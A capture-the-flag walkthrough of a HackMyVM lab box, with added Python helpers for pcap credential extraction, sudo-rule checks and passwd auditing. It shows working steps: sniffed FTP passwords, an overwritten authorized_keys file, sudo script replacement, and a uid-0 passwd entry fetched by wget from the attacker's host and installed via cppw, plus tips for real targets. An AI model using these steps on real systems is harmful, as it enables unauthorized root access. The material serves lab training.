hack-my-vm-attack

Port scan

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.134.108                                [17:34:16]
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-23 17:34 CST
Nmap scan report for 192.168.134.108
Host is up (0.020s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:67:07:CF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds

Service exploitation

FTP does not let me in: anonymous is rejected, so it wants a real username and password.

kali@kali [~] ➜  ftp  192.168.134.108                                                             [17:34:28]
Connected to 192.168.134.108.
220 ProFTPD Server (Debian) [::ffff:192.168.134.108]
Name (192.168.134.108:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp>

Next, a look at port 80.

kali@kali [~] ➜  curl http://192.168.134.108                                                      [17:36:06]
I did a capture with wireshark.
The name of the file is "capture" but i dont remember the extension :(

The capture was made with Wireshark and the extension was forgotten, so the obvious guess is Wireshark's usual extension, .pcap (if that 404s, try .pcapng, the newer default). Requesting capture.pcap downloads the file. Open it and go straight to the FTP traffic: FTP sends USER and PASS in clear text on the control channel, so a display filter of ftp (or ftp.request.command == "PASS") exposes the password.


With the credentials in hand, log in over FTP and look around. The .ssh directory contains an authorized_keys file, so I tried uploading my own authorized_keys (holding my public key) over it to see whether the server would accept the write.

ftp> ls
229 Entering Extended Passive Mode (|||37157|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 teste teste 748 Apr 23 08:37 authorized_keys
-rw-r--r-- 1 teste teste 394 Jan 7 2021 id_rsa.pub
226 Transfer complete
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||12042|)
150 Opening BINARY mode data connection for authorized_keys
100% |****************************************************************| 748 5.36 MiB/s 00:00 ETA
226 Transfer complete
748 bytes sent in 00:00 (169.56 KiB/s)

The upload succeeded, so SSH in directly. One caveat: put replaced the existing authorized_keys rather than appending to it. On a real target, download the file first, add your key to it, and upload the merged copy, so the owner's own keys keep working and the change is easier to revert.

kali@kali [~] ➜  ssh teste@192.168.134.108                                                        [17:43:32]
Linux attack 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 23 04:46:47 2025 from 192.168.134.141
teste@attack:~$

Then I got stuck. There is a mysecret.png in the home directory and a hint about finding a file, so I assumed the image hid something and spent a long time on steganography without result. After checking a writeup it turned out the answer is back in the Wireshark capture.


The capture shows a request for a filexxx.zip; let's request it ourselves and see whether it can still be downloaded.


It downloads fine, and unzipping it yields a private key.

kali@kali [~] ➜  ssh-keygen -y -f id_rsa                                                          [17:54:47]
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDC8yQhKHI2Piesf+mSfTJb16ZHtPxGMbw6b2yWwKf/hxYpFDi7FdsbIQKrXL2QClNIhmvsdDKcVrQrnKhfD4YoGV7GRqjKou6Eh8v2kymNvMtBRKfejdEwmy0/S7YvGVWewzoV4N3HhyxGjqyjGiiHF7drQWU2UGixqkijYOF34JJHQdSvVKF3jpox+Y4MAGD4XD3WhvktBLCdqGtWkGaeSae4fOfgCG5huf6SM638ts7Qr3BZt+uBZL2sz7AuKKiW/jzMOIjOB7rcoukoQVGhD/9372dkDmC1+av2ZGyvFW3ot99xgMOOzhP5Q8IHIZl8OnyTgMzs9bi+O0XGyaCB teste@attack

But this is not the key we are after: ssh-keygen -y derives its public half, and the comment is teste@attack, the user we already own. Time to look more carefully at that packet in Wireshark.


That transfer is also far larger than the zip we just downloaded, so it must carry something else. Extract the bytes (Follow TCP Stream, show the data as Raw, Save as) and write them out as a .zip file.
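As an added example (my own code, not part of the original writeup), here are the two Wireshark steps above, recovering the FTP USER/PASS pair and pulling the ZIP bytes out of a TCP stream, done in pure Python without Wireshark. The capture it runs on is constructed inline to mirror the box's traffic; the password and the key inside the ZIP are placeholders, not the real ones. It understands only classic pcap with Ethernet frames and concatenates segments in capture order, so a real capture with retransmissions or out-of-order segments still wants Wireshark's Follow TCP Stream.

```python
"""Added example: FTP credentials and ZIP carving straight from a classic pcap, stdlib only."""
import struct
import zipfile
from io import BytesIO

ETHERTYPE_IPV4, IPPROTO_TCP = 0x0800, 6


def tcp_payloads(pcap_bytes):
    """Yield (src, dst, payload) for each IPv4/TCP record that carries data (Ethernet link type only)."""
    magic = pcap_bytes[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap (pcapng needs a different parser)")
    if struct.unpack(endian + "I", pcap_bytes[20:24])[0] != 1:
        raise ValueError("only LINKTYPE_ETHERNET captures are handled")
    off = 24
    while off + 16 <= len(pcap_bytes):
        incl_len = struct.unpack(endian + "IIII", pcap_bytes[off:off + 16])[2]  # per-record header
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 54 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        if ip[9] != IPPROTO_TCP:
            continue
        tcp = ip[(ip[0] & 0x0F) * 4:struct.unpack("!H", ip[2:4])[0]]
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]  # skip the TCP header including options
        if payload:
            yield (".".join(map(str, ip[12:16])) + f":{sport}",
                   ".".join(map(str, ip[16:20])) + f":{dport}", payload)


def ftp_credentials(pcap_bytes):
    """Map (client, server) -> (user, password) from clear-text USER/PASS on the control channel."""
    users, creds = {}, {}
    for src, dst, payload in tcp_payloads(pcap_bytes):
        for line in payload.split(b"\r\n"):
            if line[:5].upper() == b"USER ":
                users[(src, dst)] = line[5:].decode(errors="replace")
            elif line[:5].upper() == b"PASS " and (src, dst) in users:
                creds[(src, dst)] = (users[(src, dst)], line[5:].decode(errors="replace"))
    return creds


def carve_zips(pcap_bytes):
    """Concatenate each direction's payload in capture order (no seq-number reassembly, so
    retransmissions would corrupt the result) and carve from the first ZIP local-header magic."""
    streams = {}
    for src, dst, payload in tcp_payloads(pcap_bytes):
        streams.setdefault((src, dst), bytearray()).extend(payload)
    carved = []
    for key, data in streams.items():
        idx = data.find(b"PK\x03\x04")
        if idx != -1:
            carved.append((key, bytes(data[idx:])))
    return carved


def zip_members(data):
    """Validate a carved blob by listing its members (raises if it is not a usable ZIP)."""
    return zipfile.ZipFile(BytesIO(data)).namelist()


# --- constructed sample capture; NOT the real capture.pcap from the box ---
def _ip(addr):
    return bytes(int(o) for o in addr.split("."))


def build_pcap(packets):
    """Little-endian classic pcap from (src, sport, dst, dport, payload) tuples; checksums left zero."""
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1))
    for src, sport, dst, dport, payload in packets:
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                         _ip(src), _ip(dst)) + tcp
        frame = bytes(12) + struct.pack("!H", ETHERTYPE_IPV4) + ip
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return bytes(out)


def _sample_zip():
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("id_rsa", "-----BEGIN OPENSSH PRIVATE KEY-----\nplaceholder, not a real key\n"
                              "-----END OPENSSH PRIVATE KEY-----\n")
    return buf.getvalue()


SAMPLE_ZIP = _sample_zip()
SAMPLE_PCAP = build_pcap([
    ("192.168.134.141", 40000, "192.168.134.108", 21, b"USER teste\r\n"),
    ("192.168.134.108", 21, "192.168.134.141", 40000, b"331 Password required for teste\r\n"),
    ("192.168.134.141", 40000, "192.168.134.108", 21, b"PASS not-the-real-password\r\n"),
    # the ZIP comes back over HTTP, split across two segments to exercise the concatenation
    ("192.168.134.108", 80, "192.168.134.141", 40001,
     b"HTTP/1.1 200 OK\r\nContent-Type: application/zip\r\n\r\n" + SAMPLE_ZIP[:40]),
    ("192.168.134.108", 80, "192.168.134.141", 40001, SAMPLE_ZIP[40:]),
])

if __name__ == "__main__":
    print(ftp_credentials(SAMPLE_PCAP))
    for (src, dst), blob in carve_zips(SAMPLE_PCAP):
        print(src, "->", dst, zip_members(blob))
```

Run it against a real file with `ftp_credentials(open("capture.pcap", "rb").read())`; carve_zips returns the whole tail of the stream from the first PK header, and zip_members tells you whether that tail is a usable archive.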


Unzipping that reveals a QR code image. Scanning it gives a URL, and fetching that URL returns the private key we need.


Log in with that key as jackob. The hint says to run attack.sh, and sudo -l conveniently allows jackob to run exactly that file as kratos, but what attack.sh contains is not what we want to execute.

Since the script lives in jackob's own home directory, we control it: sudo only checks the path, not the content, and because the directory is ours we can delete the file and write a new one even if the file itself were not writable.

jackob@attack:~$ ls
attack.sh flag.sh note.txt user.txt
jackob@attack:~$ pwd
/home/jackob
jackob@attack:~$ sudo -l
Matching Defaults entries for jackob on attack:
!env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jackob may run the following commands on attack:
(kratos) NOPASSWD: /home/jackob/attack.sh
jackob@attack:~$ rm -rf attack.sh
jackob@attack:~$ echo "bash" > attack.sh && chmod +x attack.sh
jackob@attack:~$ sudo -u kratos /home/jackob/attack.sh
kratos@attack:~$ id
uid=1002(kratos) gid=1002(kratos) groups=1002(kratos)
kratos@attack:~$
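A quick check I would run on any sudo -l result, added here as an example (not from the writeup): parse the rules and report which targets the invoking user can alter, either because the file is writable or because its directory is, which is the property the rm-and-rewrite of attack.sh above depends on. The demo builds a throwaway directory with an attack.sh of its own and a constructed sudo -l text; /usr/sbin/cppw is included only to show a rule whose target is normally untouchable.

```python
"""Added example: flag sudo targets the calling user can tamper with."""
import os
import re
import stat
import tempfile

# matches rule lines such as "    (kratos) NOPASSWD: /home/jackob/attack.sh"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?:[A-Z_]+:\s*)*(?P<cmd>/\S+)")


def parse_sudo_l(text):
    """Return [(runas, absolute_command_path)] for each rule line; Defaults lines are ignored."""
    return [(m.group("runas"), m.group("cmd")) for m in map(RULE_RE.match, text.splitlines()) if m]


def tamperable(path):
    """Ways the current user could change what `sudo <path>` ends up executing."""
    reasons = []
    if os.access(path, os.W_OK):
        reasons.append("file writable")
    parent = os.path.dirname(path) or "/"
    if os.access(parent, os.W_OK):
        sticky = bool(os.stat(parent).st_mode & stat.S_ISVTX)
        # in a sticky directory (e.g. /tmp) only the owner or root may unlink the file
        owned = not os.path.exists(path) or os.stat(path).st_uid == os.geteuid()
        if not sticky or owned:
            reasons.append("directory writable: file can be replaced")
    return reasons


def audit(sudo_l_text):
    """{command_path: (runas, [reasons])} for every rule in the sudo -l output."""
    return {cmd: (runas, tamperable(cmd)) for runas, cmd in parse_sudo_l(sudo_l_text)}


def demo():
    """Constructed scenario mirroring the writeup: the allowed script sits in a directory we own."""
    home = tempfile.mkdtemp(prefix="jackob-")
    script = os.path.join(home, "attack.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\necho 'original script'\n")
    os.chmod(script, 0o755)
    sudo_l = (
        "Matching Defaults entries for jackob on attack:\n"
        "    !env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\n"
        "\n"
        "User jackob may run the following commands on attack:\n"
        f"    (kratos) NOPASSWD: {script}\n"
        "    (root) NOPASSWD: /usr/sbin/cppw\n"
    )
    return script, audit(sudo_l)


if __name__ == "__main__":
    _script, report = demo()
    for cmd, (runas, reasons) in report.items():
        print(f"{cmd} (as {runas}): {', '.join(reasons) or 'no obvious write path'}")
```

On the box itself you would feed it `audit(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)`; any rule with a non-empty reason list is a one-line privilege change away, as the echo "bash" > attack.sh above shows.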

Privilege escalation

With a kratos shell, check what this user can do.

kratos@attack:~$ sudo -l
Matching Defaults entries for kratos on attack:
!env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kratos may run the following commands on attack:
(root) NOPASSWD: /usr/sbin/cppw

cppw is not a custom binary: Debian's passwd package ships cppw and cpgr, which copy a given file over /etc/passwd, /etc/shadow, /etc/group or /etc/gshadow while holding the lock. Letting kratos run it as root without a password is the whole bug. Its -h output spells out the usage.

kratos@attack:~$ sudo /usr/sbin/cppw
cppw: wrong number of arguments, -h for usage
cppw: no changes
kratos@attack:~$ sudo /usr/sbin/cppw -h
Usage:
`cppw <file>' copys over /etc/passwd `cppw -s <file>' copys over /etc/shadow
`cpgr <file>' copys over /etc/group `cpgr -s <file>' copys over /etc/gshadow

The usage says it all: `cppw <file>` copies the file straight over /etc/passwd, and since it runs as root it never checks who wrote the file. So generate a password hash first (openssl passwd without options produced an MD5-crypt $1$ hash here; -6 gives SHA-512 crypt, which Debian also accepts):

kali@kali [~] ➜  openssl passwd 123                                                                                                              [18:17:30]
$1$RGaY3Vjt$z1NRZgq0nt5bQ.T5AOPge.

Then write the new user. Start from the target's existing /etc/passwd (it is world-readable, so just copy it) and append one line with uid 0 and gid 0 whose second field holds the hash itself instead of x, so the login needs no /etc/shadow entry. Keeping every original line intact matters: a missing or malformed line in a file that replaces /etc/passwd breaks logins for everyone, including the attacker.

kali@kali [~] ➜  cat a                                                                                                                           [18:18:41]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
teste:x:1000:1000:teste,,,:/home/teste:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin
jackob:x:1001:1001:,,,:/home/jackob:/bin/bash
kratos:x:1002:1002:,,,:/home/kratos:/bin/bash
sunrt:$1$RGaY3Vjt$z1NRZgq0nt5bQ.T5AOPge.:0:0:root:/root:/bin/bash
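Before handing a file to cppw I would run a sanity check like this on the candidate (added example, not part of the writeup): it parses the file, reports UID-0 accounts other than root and hashes living in the password field, and rejects malformed lines that would corrupt /etc/passwd and lock everyone out. The same function is what a defender would run over a passwd backup to spot exactly this modification. The sample data is a constructed excerpt of the box's passwd with the sunrt line from above appended.

```python
"""Added example: audit a passwd-format file for the tampering cppw makes possible."""

SHADOWED = {"x", "*", "!", "!!"}  # second-field values that mean "no usable hash here"


def parse_passwd(text):
    """Return (entries, problems); malformed lines are reported rather than parsed."""
    entries, problems = [], []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            problems.append(f"line {n}: expected 7 fields, got {len(fields)}")
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            problems.append(f"line {n}: non-numeric uid/gid for {name!r}")
            continue
        entries.append({"line": n, "name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries, problems


def audit_passwd(text):
    """List findings; an empty list means the file looks like an ordinary passwd."""
    entries, findings = parse_passwd(text)
    seen = set()
    for e in entries:
        tag = f"line {e['line']}: {e['name']}"
        if e["name"] in seen:
            findings.append(f"{tag} duplicate username")
        seen.add(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{tag} has uid 0 (root-equivalent account)")
        if e["pw"] == "":
            findings.append(f"{tag} empty password field (no password needed)")
        elif e["pw"] not in SHADOWED:
            # a hash in passwd is honoured for login and readable by every local user
            findings.append(f"{tag} hash stored in world-readable passwd: {e['pw'][:3]}...")
    return findings


def added_entries(before, after):
    """Usernames present in the candidate file but absent from the current one."""
    old = {e["name"] for e in parse_passwd(before)[0]}
    return [e["name"] for e in parse_passwd(after)[0] if e["name"] not in old]


# constructed excerpt of the box's passwd, plus the line appended in the writeup
CLEAN = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
teste:x:1000:1000:teste,,,:/home/teste:/bin/bash
jackob:x:1001:1001:,,,:/home/jackob:/bin/bash
kratos:x:1002:1002:,,,:/home/kratos:/bin/bash
"""
TAMPERED = CLEAN + "sunrt:$1$RGaY3Vjt$z1NRZgq0nt5bQ.T5AOPge.:0:0:root:/root:/bin/bash\n"
BROKEN = CLEAN + "oops:x:0:0:/root:/bin/bash\n"  # six fields: would corrupt /etc/passwd

if __name__ == "__main__":
    for label, text in (("clean", CLEAN), ("tampered", TAMPERED), ("broken", BROKEN)):
        print(label, audit_passwd(text) or "no findings")
    print("added:", added_entries(CLEAN, TAMPERED))
```

Run `audit_passwd(open("a").read())` on the file before cppw a: the expected result is exactly two findings on the sunrt line and nothing else; any layout complaint means the file should not be copied over.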

Serve the file from Kali over HTTP (port 8000 here), fetch it on the target with wget, copy it over /etc/passwd with cppw, and su to the new user with the password that was hashed (123):

kratos@attack:/home/kratos$ wget http://192.168.134.141:8000/a
--2025-04-23 06:20:15-- http://192.168.134.141:8000/a
Connecting to 192.168.134.141:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1649 (1.6K) [application/octet-stream]
Saving to: ‘a’

a 100%[============================================================================>] 1.61K --.-KB/s in 0s

2025-04-23 06:20:15 (219 MB/s) - ‘a’ saved [1649/1649]

kratos@attack:/home/kratos$ ls
a
kratos@attack:/home/kratos$ sudo -l
Matching Defaults entries for kratos on attack:
!env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kratos may run the following commands on attack:
(root) NOPASSWD: /usr/sbin/cppw
kratos@attack:/home/kratos$ sudo /usr/sbin/cppw a
kratos@attack:/home/kratos$ su - sunrt
Password:
root@attack:~# id
uid=0(root) gid=0(root) groups=0(root)
root@attack:~#